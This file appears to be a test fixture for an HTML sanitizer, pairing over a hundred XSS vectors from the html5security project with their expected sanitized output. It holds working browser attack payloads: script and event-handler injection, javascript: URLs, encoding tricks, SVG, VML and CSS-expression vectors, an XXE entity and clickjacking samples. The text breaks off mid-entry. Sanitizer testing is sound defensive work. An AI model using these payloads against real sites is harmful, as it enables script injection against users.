results.js (45230B)
1 // vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license 2 3 var vectors = [ 4 { 5 data: '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', 6 sanitized: "<html><head></head><body></body></html>", 7 }, 8 { 9 data: '<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', 10 sanitized: 11 "<html><head></head><body>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</body></html>", 12 }, 13 { 14 data: '<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', 15 sanitized: 16 "<html><head></head><body>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&></body></html>", 17 }, 18 { 19 data: "0?<script>Worker(\"#\").onmessage=message=>eval(message.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))", 20 sanitized: 21 "<html><head></head><body>0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>", 22 }, 23 { 24 data: "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", 25 sanitized: "<html><head></head><body></body></html>", 26 }, 27 { 28 data: "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", 29 sanitized: "<html><head></head><body></body></html>", 30 }, 31 { 32 data: "<input onfocus=write(1) autofocus>", 33 sanitized: "<html><head></head><body></body></html>", 34 }, 35 { 36 data: "<input onblur=write(1) autofocus><input autofocus>", 37 sanitized: "<html><head></head><body></body></html>", 38 }, 39 { 40 data: "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>", 41 sanitized: "<html><head></head><body><a>X</a></body></html>", 42 }, 43 { 44 data: "<video poster=javascript:alert(1)//></video>", 45 sanitized: 46 '<html><head></head><body><video controls="controls"></video></body></html>', 47 }, 48 { 49 data: '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>', 50 sanitized: "<html><head></head><body></body></html>", 51 }, 52 { 53 data: "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", 54 sanitized: 55 "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>", 56 }, 57 { 58 data: '<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>', 59 sanitized: "<html><head></head><body>01</body></html>", 60 }, 61 { 62 data: "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>", 63 sanitized: "<html><head></head><body></body></html>", 64 }, 65 { 66 data: "<script>({0:#0=alert/#0#/#0#(0)})</script>", 67 sanitized: "<html><head></head><body></body></html>", 68 }, 69 { 70 data: "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >", 71 sanitized: "<html><head></head><body>X</body></html>", 72 }, 73 { 74 data: '<?xml-stylesheet href="javascript:alert(1)"?><root/>', 75 sanitized: "<html><head></head><body></body></html>", 76 }, 77 { 78 data: '<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', 79 sanitized: "<html><head></head><body></body></html>", 80 }, 81 { 82 data: '<meta charset="x-mac-farsi">�script �alert(1)//�/script �', 83 sanitized: 84 "<html><head></head><body>�script �alert(1)//�/script �</body></html>", 85 }, 86 { 87 data: "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", 88 sanitized: "<html><head></head><body></body></html>", 89 }, 90 { 91 data: "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", 92 sanitized: "<html><head></head><body></body></html>", 93 }, 94 { 95 data: "<input onblur=focus() autofocus><input>", 96 sanitized: "<html><head></head><body></body></html>", 97 }, 98 { 99 data: "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>", 100 sanitized: "<html><head></head><body></body></html>", 101 }, 102 { 103 data: "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>", 104 sanitized: "<html><head></head><body>1</body></html>", 105 }, 106 { 107 data: '<script src="#">{alert(1)}</script>;1', 108 sanitized: "<html><head></head><body>;1</body></html>", 109 }, 110 { 111 data: "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);", 112 sanitized: 113 "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>", 114 }, 115 { 116 data: "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", 117 sanitized: "<html><head></head><body></body></html>", 118 }, 119 { 120 data: "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>", 121 sanitized: "<html><head></head><body>1</body></html>", 122 }, 123 { 124 data: "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d", 125 sanitized: "<html><head></head><body></body></html>", 126 }, 127 { 128 data: '<style>@import "data:,*%7bx:expression(write(1))%7D";</style>', 129 sanitized: "<html><head></head><body></body></html>", 130 }, 131 { 132 data: "<frameset onload=alert(1)>", 133 sanitized: "<html><head></head></html>", 134 }, 135 { 136 data: '<table background="javascript:alert(1)"></table>', 137 sanitized: "<html><head></head><body><table></table></body></html>", 138 }, 139 { 140 data: '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', 141 sanitized: 142 "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>", 143 }, 144 { 145 data: "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>", 146 sanitized: "<html><head></head><body>1</body></html>", 147 }, 148 { 149 data: "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>", 150 sanitized: '<html><head></head><body>1<a href="#"></a></body></html>', 151 }, 152 { 153 data: '<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', 154 sanitized: "<html><head></head><body><a>XXX</a></body></html>", 155 }, 156 { 157 data: '<!--<img src="--><img src=x onerror=alert(1)//">', 158 sanitized: "<html><head></head><body><img></body></html>", 159 }, 160 { 161 data: '<comment><img src="</comment><img src=x onerror=alert(1)//">', 162 sanitized: "<html><head></head><body><img></body></html>", 163 }, 164 { 165 data: '<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src="]><img src=x onerror=alert(1)//">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->\r\n<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', 166 sanitized: 167 '<html><head></head><body><img>\n\n\n><image xlink:href="<img></body></html>', 168 }, 169 { 170 data: '<style><img src="</style><img src=x onerror=alert(1)//">', 171 sanitized: "<html><head></head><body><img></body></html>", 172 }, 173 { 174 data: "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", 175 sanitized: "<html><head></head><body><li></li>\n<div></div></body></html>", 176 }, 177 { 178 data: '<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>', 179 sanitized: "<html><head></head><body><a>XXX</a></body></html>", 180 }, 181 { 182 data: '<?xml version="1.0" standalone="no"?>\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<style type="text/css">\r\n@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>', 183 sanitized: "<html><head>\n\n</head>\n<body>Hello\n</body></html>", 184 }, 185 { 186 data: "<style>*[{}@import'test.css?]{color: green;}</style>X", 187 sanitized: "<html><head></head><body>X</body></html>", 188 }, 189 { 190 data: "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>", 191 sanitized: "<html><head></head><body><div>XXX</div></body></html>", 192 }, 193 { 194 data: '<div style="font-family:foo}color=red;">XXX</div>', 195 sanitized: "<html><head></head><body><div>XXX</div></body></html>", 196 }, 197 { 198 data: '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>', 199 sanitized: "<html><head></head><body></body></html>", 200 }, 201 { 202 data: "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>", 203 sanitized: "<html><head></head><body></body></html>", 204 }, 205 { 206 data: '<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', 207 sanitized: "<html><head></head><body></body></html>", 208 }, 209 { 210 data: '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>', 211 sanitized: "<html><head></head><body></body></html>", 212 }, 213 { 214 data: '<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>', 215 sanitized: "<html><head></head><body></body></html>", 216 }, 217 { 218 data: '<x style="behavior:url(test.sct)">', 219 sanitized: "<html><head></head><body></body></html>", 220 }, 221 { 222 data: '<xml id="xss" src="test.htc"></xml>\r\n<label dataformatas="html" datasrc="#xss" datafld="payload"></label>', 223 sanitized: "<html><head></head><body>\n<label></label></body></html>", 224 }, 225 { 226 data: "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", 227 sanitized: "<html><head></head><body></body></html>", 228 }, 229 { 230 data: '<video><source onerror="alert(1)">', 231 sanitized: 232 '<html><head></head><body><video controls="controls"><source></video></body></html>', 233 }, 234 { 235 data: '<video onerror="alert(1)"><source></source></video>', 236 sanitized: 237 '<html><head></head><body><video controls="controls"><source></video></body></html>', 238 }, 239 { 240 data: "<b <script>alert(1)//</script>0</script></b>", 241 sanitized: "<html><head></head><body><b>alert(1)//0</b></body></html>", 242 }, 243 { 244 data: "<b><script<b></b><alert(1)</script </b></b>", 245 sanitized: "<html><head></head><body><b></b></body></html>", 246 }, 247 { 248 data: '<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', 249 sanitized: 250 '<html><head></head><body><div id="div1"></div> <div id="div2"></div></body></html>', 251 }, 252 { 253 data: '<div style="[a]color[b]:[c]red">XXX</div>', 254 sanitized: "<html><head></head><body><div>XXX</div></body></html>", 255 }, 256 { 257 data: '<div style="\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;">XXX</div>', 258 sanitized: "<html><head></head><body><div>XXX</div></body></html>", 259 }, 260 { 261 data: "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>", 262 sanitized: "<html><head></head><body>\n\n\n\n</body></html>", 263 }, 264 { 265 data: '<embed src="javascript:alert(1)"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src="javascript:alert(2)">\r\n<image src="javascript:alert(2)"> // IE6, O10.10�, OM10.0�\r\n<script src="javascript:alert(3)"></script> // IE6, O11.01�, OM10.1�', 266 sanitized: 267 "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>", 268 }, 269 { 270 data: '<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>', 271 sanitized: 272 "<!DOCTYPE x[<!entity>\n<html><head></head><body>]>&x;</body></html>", 273 }, 274 { 275 data: '<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', 276 sanitized: "<html><head></head><body></body></html>", 277 }, 278 { 279 data: "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>", 280 sanitized: "<html><head></head><body></body></html>", 281 }, 282 { 283 data: '<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"\r\n onerror CDATA "alert(1)"\r\n onload CDATA "alert(2)">\r\n]><img />', 284 sanitized: 285 "<!DOCTYPE x>\n<html><head></head><body>]><img></body></html>", 286 }, 287 { 288 data: '<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">\r\n\t<html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>\r\n</doc>', 289 sanitized: "<html><head></head><body>\n\tXXX\n</body></html>", 290 }, 291 { 292 data: '<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>', 293 sanitized: "<html><head></head><body></body></html>", 294 }, 295 { 296 data: "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", 297 sanitized: "<html><head></head><body><div>x</div></body></html>", 298 }, 299 { 300 data: "<// style=x:expression\\28write(1)\\29>", 301 sanitized: "<html><head></head><body></body></html>", 302 }, 303 { 304 data: '<form><button formaction="javascript:alert(1)">X</button>', 305 sanitized: "<html><head></head><body></body></html>", 306 }, 307 { 308 data: '<event-source src="event.php" onload="alert(1)">', 309 sanitized: "<html><head></head><body></body></html>", 310 }, 311 { 312 data: '<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>', 313 sanitized: "<html><head></head><body><a></a></body></html>", 314 }, 315 { 316 data: "<script<{alert(1)}/></script </>", 317 sanitized: "<html><head></head><body></body></html>", 318 }, 319 { 320 data: '<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>', 321 sanitized: 322 '<!DOCTYPE x SYSTEM "test.dtd">\n<html><head></head><body>&x;</body></html>', 323 }, 324 { 325 data: '<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', 326 sanitized: "<html><head></head><body></body></html>", 327 }, 328 { 329 data: '<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>', 330 sanitized: "<html><head></head><body><img></body></html>", 331 }, 332 { 333 data: '<object allowscriptaccess="always" data="test.swf"></object>', 334 sanitized: "<html><head></head><body></body></html>", 335 }, 336 { 337 data: "<style>*{x:EXPRESSION(write(1))}</style>", 338 sanitized: "<html><head></head><body></body></html>", 339 }, 340 { 341 data: '<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>', 342 sanitized: "<html><head></head><body></body></html>", 343 }, 344 { 345 data: '<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', 346 sanitized: "<html><head></head><body></body></html>", 347 }, 348 { 349 data: '<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>', 350 sanitized: "<html><head></head><body></body></html>", 351 }, 352 { 353 data: '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>', 354 sanitized: "<html><head></head><body></body></html>", 355 }, 356 { 357 data: '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>', 358 sanitized: "<html><head></head><body></body></html>", 359 }, 360 { 361 data: "<body oninput=alert(1)><input autofocus>", 362 sanitized: "<html><head></head><body></body></html>", 363 }, 364 { 365 data: '<svg xmlns="http://www.w3.org/2000/svg">\n<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a>\n</svg>', 366 sanitized: "<html><head></head><body>\n\n</body></html>", 367 }, 368 { 369 data: '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">\n\n<animation xlink:href="javascript:alert(1)"/>\n<animation xlink:href="data:text/xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' onload=\'alert(1)\'%3E%3C/svg%3E"/>\n\n<image xlink:href="data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' onload=\'alert(1)\'%3E%3C/svg%3E"/>\n\n<foreignObject xlink:href="javascript:alert(1)"/>\n<foreignObject xlink:href="data:text/xml,%3Cscript xmlns=\'http://www.w3.org/1999/xhtml\'%3Ealert(1)%3C/script%3E"/>\n\n</svg>', 370 sanitized: "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>", 371 }, 372 { 373 data: '<svg xmlns="http://www.w3.org/2000/svg">\n<set attributeName="onmouseover" to="alert(1)"/>\n<animate attributeName="onunload" to="alert(1)"/>\n</svg>', 374 sanitized: "<html><head></head><body>\n\n\n</body></html>", 375 }, 376 { 377 data: '<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style="background:url(test5.svg)">PRESS ENTER</div>', 378 sanitized: 379 "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>", 380 }, 381 { 382 data: '[A]\n<? foo="><script>alert(1)</script>">\n<! foo="><script>alert(1)</script>">\n</ foo="><script>alert(1)</script>">\n[B]\n<? foo="><x foo=\'?><script>alert(1)</script>\'>">\n[C]\n<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">\n[D]\n<% foo><x foo="%><script>alert(1)</script>">', 383 sanitized: 384 '<html><head></head><body>[A]\n">\n">\n">\n[B]\n">\n[C]\n\n[D]\n<% foo></body></html>', 385 }, 386 { 387 data: '<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', 388 sanitized: "<html><head></head><body><div>X</div></body></html>", 389 }, 390 { 391 data: '<div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', 392 sanitized: "<html><head></head><body><div>X</div></body></html>", 393 }, 394 { 395 data: '<svg xmlns="http://www.w3.org/2000/svg">\n<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>\n</svg>', 396 sanitized: "<html><head></head><body>\nalert(1)\n</body></html>", 397 }, 398 { 399 data: '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">\n<feImage>\n<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>\n</feImage>\n</svg>', 400 sanitized: "<html><head></head><body>\n\n\n\n</body></html>", 401 }, 402 { 403 data: "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>", 404 sanitized: "<html><head></head><body>\n</body></html>", 405 }, 406 { 407 data: "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>", 408 sanitized: 409 '<html><head></head><body><div id="d"></div>\n\n\n\n<div id="d"></div>\n</body></html>', 410 }, 411 { 412 data: '<div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div>\n<script>with(document.getElementById("d"))innerHTML=innerHTML</script>', 413 sanitized: 414 '<html><head></head><body><div id="d"><div>X</div></div>\n</body></html>', 415 }, 416 { 417 data: "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red} /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>", 418 sanitized: "<html><head></head><body>XXX</body></html>", 419 }, 420 { 421 data: '<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', 422 sanitized: "<html><head></head><body></body></html>", 423 }, 424 { 425 data: '<a href="[a]java[b]script[c]:alert(1)">XXX</a>', 426 sanitized: "<html><head></head><body><a>XXX</a></body></html>", 427 }, 428 { 429 data: '<img src="x` `<script>alert(1)</script>"` `>', 430 sanitized: "<html><head></head><body><img></body></html>", 431 }, 432 { 433 data: "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>", 434 sanitized: "<html><head></head><body></body></html>", 435 }, 436 { 437 data: '<svg xmlns="http://www.w3.org/2000/svg" id="foo">\r\n<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>\r\n</svg>', 438 sanitized: "<html><head></head><body>\n\n</body></html>", 439 }, 440 { 441 data: '<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', 442 sanitized: "<html><head></head><body></body></html>", 443 }, 444 { 445 data: '<img src onerror /" \'"= alt=alert(1)//">', 446 sanitized: "<html><head></head><body><img></body></html>", 447 }, 448 { 449 data: "<title onpropertychange=alert(1)></title><title title=></title>", 450 sanitized: 451 '<html><head><title></title><title title=""></title></head><body></body></html>', 452 }, 453 { 454 data: '<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">\r\n<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">', 455 sanitized: 456 '<html><head></head><body><a href="http://foo.bar/#x=`y"></a><img alt="`><img src=xx:x onerror=alert(1)></a>">\n\n\n<img alt="`><img src=xx:x onerror=alert(2)//">\n<img alt="`><img src=xx:x onerror=alert(3)//"></body></html>', 457 }, 458 { 459 data: '<svg xmlns="http://www.w3.org/2000/svg">\n<a id="x"><rect fill="white" width="1000" height="1000"/></a>\n<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>\n</svg>', 460 sanitized: "<html><head></head><body>\n\n\n</body></html>", 461 }, 462 { 463 data: '<svg xmlns="http://www.w3.org/2000/svg">\r\n<path d="M0,0" style="marker-start:url(test4.svg#a)"/>\r\n</svg>', 464 sanitized: "<html><head></head><body>\n\n</body></html>", 465 }, 466 { 467 data: '<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', 468 sanitized: "<html><head></head><body><div>X</div></body></html>", 469 }, 470 { 471 data: '<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', 472 sanitized: "<html><head></head><body><div>X</div></body></html>", 473 }, 474 { 475 data: '<div id="x">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>', 476 sanitized: '<html><head></head><body><div id="x">XXX</div>\n</body></html>', 477 }, 478 { 479 data: "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>", 480 sanitized: "<html><head></head><body>XXX</body></html>", 481 }, 482 { 483 data: "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->", 484 sanitized: "<html><head></head><body></body></html>", 485 }, 486 { 487 data: '<div id="x">x</div>\n<xml:namespace prefix="t">\n<import namespace="t" implementation="#default#time2">\n<t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">', 488 sanitized: 489 '<html><head></head><body><div id="x">x</div>\n\n\n</body></html>', 490 }, 491 { 492 data: '<a href="http://attacker.org">\n\t<iframe src="http://example.org/"></iframe>\n</a>', 493 sanitized: 494 '<html><head></head><body><a href="http://attacker.org">\n\t\n</a></body></html>', 495 }, 496 { 497 data: '<div draggable="true" ondragstart="event.dataTransfer.setData(\'text/plain\',\'malicious code\');">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src="http://www.example.org/dropHere.html"></iframe>', 498 sanitized: 499 '<html><head></head><body><div draggable="true">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>', 500 }, 501 { 502 data: '<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>\n\n<textarea type="text" cols="50" rows="10"></textarea>', 503 sanitized: 504 '<html><head></head><body>\n\n<textarea type="text" cols="50" rows="10"></textarea></body></html>', 505 }, 506 { 507 data: "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>", 508 sanitized: 509 '<html><head>\n\n</head><body>\n<a href="#">Spam</a></body></html>', 510 }, 511 { 512 data: '<html xmlns="http://www.w3.org/1999/xhtml"\nxmlns:svg="http://www.w3.org/2000/svg">\n<body style="background:gray">\n<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>\n<svg:svg>\n<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">\n\t<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>\n\t<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>', 513 sanitized: 514 '<html><head></head><body>\n\n<svg:svg>\n<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">\n\t<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>\n\t<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html></body></html>', 515 }, 516 { 517 data: '<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>', 518 sanitized: "<html><head></head><body></body></html>", 519 }, 520 { 521 data: '<span class=foo>Some text</span>\n<a class=bar href="http://www.example.org">www.example.org</a>\n\n<script src="http://code.jquery.com/jquery-1.4.4.js"></script>\n<script>\n$("span.foo").click(function() {\nalert(\'foo\');\n$("a.bar").click();\n});\n$("a.bar").click(function() {\nalert(\'bar\');\nlocation="http://html5sec.org";\n});\n</script>', 522 sanitized: 523 '<html><head></head><body><span class="foo">Some text</span>\n<a class="bar" href="http://www.example.org">www.example.org</a>\n\n\n</body></html>', 524 }, 525 { 526 data: '<script src="/\\example.com\\foo.js"></script> // Safari 5.0, Chrome 9, 10\n<script src="\\\\example.com\\foo.js"></script> // Safari 5.0', 527 sanitized: 528 "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>", 529 }, 530 { 531 data: '<?xml version="1.0"?>\r\n<?xml-stylesheet type="text/xml" href="#stylesheet"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED>]>\r\n<svg xmlns="http://www.w3.org/2000/svg">\r\n <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">\r\n <xsl:template match="/">\r\n <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe>\r\n </xsl:template>\r\n </xsl:stylesheet>\r\n <circle fill="red" r="40"></circle>\r\n</svg>', 532 sanitized: 533 "<!DOCTYPE doc>\n<html><head></head><body>]>\n\n \n \n \n \n \n \n</body></html>", 534 }, 535 { 536 data: '<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>\r\n<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', 537 sanitized: "<html><head></head><body>\n</body></html>", 538 }, 539 { 540 data: '<svg xmlns="http://www.w3.org/2000/svg" id="x">\r\n<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" 